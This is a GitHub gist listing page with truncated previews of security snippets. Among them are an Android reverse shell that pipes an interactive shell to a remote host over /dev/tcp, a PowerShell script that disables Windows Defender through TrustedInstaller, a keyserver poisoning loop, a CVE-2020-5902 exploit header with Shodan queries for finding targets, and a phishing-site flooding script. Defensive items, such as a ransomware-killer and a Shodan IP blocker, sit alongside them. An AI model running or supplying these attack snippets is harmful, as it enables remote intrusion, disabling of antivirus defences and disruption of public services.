Skip to content

Instantly share code, notes, and snippets.

Avatar

Vesselin Bontchev bontchev

View GitHub Profile
@geek-at
geek-at / trash.sh
Created Aug 13, 2020
The script used to trash a banking phishing site
View trash.sh
#!/bin/bash
while :; do
verf=$(cat /dev/urandom | tr -dc '0-9' | fold -w 8 | head -n 1)
pin=$(cat /dev/urandom | tr -dc '0-9' | fold -w 5 | head -n 1)
ip=$(printf "%d.%d.%d.%d\n" "$((RANDOM % 256))" "$((RANDOM % 256))" "$((RANDOM % 256))" "$((RANDOM % 256))")
@cihanmehmet
cihanmehmet / CVE-2020-5902.md
Last active Oct 10, 2021
BIGIP CVE-2020-5902 Exploit POC
View CVE-2020-5902.md

🚨BIGIP CVE-2020-5902 Exploit POC 🔥🧱🔨👀


Shodan Seaarch

title:"Big-IP®" org:"Organization Name"
http.title:"BIG-IP®- Redirect" org:"Organization Name"
http.favicon.hash:-335242539 "3992" org:"Organization Name"

🔸LFI

@tyranid
tyranid / doh.ps1
Created May 4, 2020
Something or other.
View doh.ps1
$cmdline = '/C sc.exe config windefend start= disabled && sc.exe sdset windefend D:(D;;GA;;;WD)(D;;GA;;;OW)'
$a = New-ScheduledTaskAction -Execute "cmd.exe" -Argument $cmdline
Register-ScheduledTask -TaskName 'TestTask' -Action $a
$svc = New-Object -ComObject 'Schedule.Service'
$svc.Connect()
$user = 'NT SERVICE\TrustedInstaller'
$folder = $svc.GetFolder('\')
@jthuraisamy
jthuraisamy / _README.md
Last active Aug 16, 2021
GospelRoom: Data Storage in UEFI NVRAM Variables
View _README.md

GospelRoom: Data Storage in UEFI NVRAM Variables

Behaviour

Persist data in UEFI NVRAM variables.

Benefits

  1. Stealthy way to store secrets and other data in UEFI.
  2. Will survive a reimaging of the operating system.
View Kill-Ransomware.ps1
# Ransomware Killer v0.1 by Thomas Patzke <thomas@patzke.org>
# Kill all parent processes of the command that tries to run "vssadmin Delete Shadows"
# IMPORTANT: This must run with Administrator privileges!
Register-WmiEvent -Query "select * from __instancecreationevent within 0.1 where targetinstance isa 'win32_process' and targetinstance.CommandLine like '%vssadmin%Delete%Shadows%'" -Action {
# Kill all parent processes from detected vssadmin process
$p = $EventArgs.NewEvent.TargetInstance
while ($p) {
$ppid = $p.ParentProcessID
$pp = Get-WmiObject -Class Win32_Process -Filter "ProcessID=$ppid"
Write-Host $p.ProcessID
@alpakido
alpakido / fill_the_pool.sh
Last active Dec 13, 2020
Redacted SKS exploit that was sent to me by attacker behind https://news.ycombinator.com/item?id=20312826
View fill_the_pool.sh
for _ in {1..500}; do
for _ in {1..100}; do
gpg --gen-key --batch keygen
gpg --quick-sign-key -u Marc EC18257DB21746FC711054BEB19C61D61333360C
rm ~/.gnupg/private-keys-v1.d/*.key
done
rm ~/.gnupg/openpgp-revocs.d/*.rev
gpg -a --export > ~/Desktop/keyblock.asc
@AveYo
AveYo / .. MediaCreationTool.bat ..md
Last active Nov 29, 2021
Universal MediaCreationTool wrapper for all MCT Windows 10 versions from 1507 to 21H1 with business (Enterprise) edition support
View .. MediaCreationTool.bat ..md

We did it! We broke gist.github.com ;) So head over to the new home! Thank you all!
2021.10.20: https://github.com/AveYo/MediaCreationTool.bat now open for interaction

  • new update introducing no 11 setup checks on boot in VirtualBox

Not just an Universal MediaCreationTool wrapper script with ingenious support for business editions,
Preview
A powerful yet simple windows 10 / 11 deployment automation tool as well!

configure via set vars, commandline parameters or rename script like iso 21H2 Pro MediaCreationTool.bat
recommended windows setup options with the least amount of issues on upgrades set via auto.cmd

@random-robbie
random-robbie / android-shell.sh
Last active Nov 18, 2021
Android Reverse Shell
View android-shell.sh
#!/bin/bash
# Simple reverse shell on android devie using Android Debug Bridge ensure you run nc -lvp 4444 on another screen first.
# By Random_Robbie
adb connect $1:5555
adb shell sh -i >& /dev/tcp/$2/4444 0>&1
echo "[*] Should have a shell now ..... Be nice :) [*]"
@CJFWeatherhead
CJFWeatherhead / crontab
Created Feb 16, 2018
Automatically redirect Tor traffic to onion (Hopefully efficiently as the if processing isn't intensive)
View crontab
##Get New Exit Node list ever 6 Hours
57 */6 * * * `curl https://check.torproject.org/cgi-bin/TorBulkExitList.py\?ip\=<yourip> | awk '{print $0" TOREX;"}' > /etc/nginx/includes/torexit.ips && service nginx restart`
@jgamblin
jgamblin / antiautosploit.py
Last active Oct 12, 2021
Blocks Shodan IPs From Scanning Your Servers.
View antiautosploit.py
#!/usr/bin/python3
import os
shodan = ["104.131.0.69", "104.236.198.48", "155.94.222.12","155.94.254.133", "155.94.254.143", "162.159.244.38", "185.181.102.18", "188.138.9.50", "198.20.69.74", "198.20.69.98", "198.20.70.114", "198.20.87.98", "198.20.99.130", "208.180.20.97", "209.126.110.38", "216.117.2.180", "66.240.192.138", "66.240.219.146", "66.240.236.119", "71.6.135.131", "71.6.146.185", "71.6.158.166", "71.6.165.200", "71.6.167.142", "82.221.105.6", "82.221.105.7", "85.25.103.50", "85.25.43.94", "93.120.27.62", "98.143.148.107", "98.143.148.135"]
for ip in shodan:
os.system("iptables -A INPUT -s {} -j DROP".format(ip))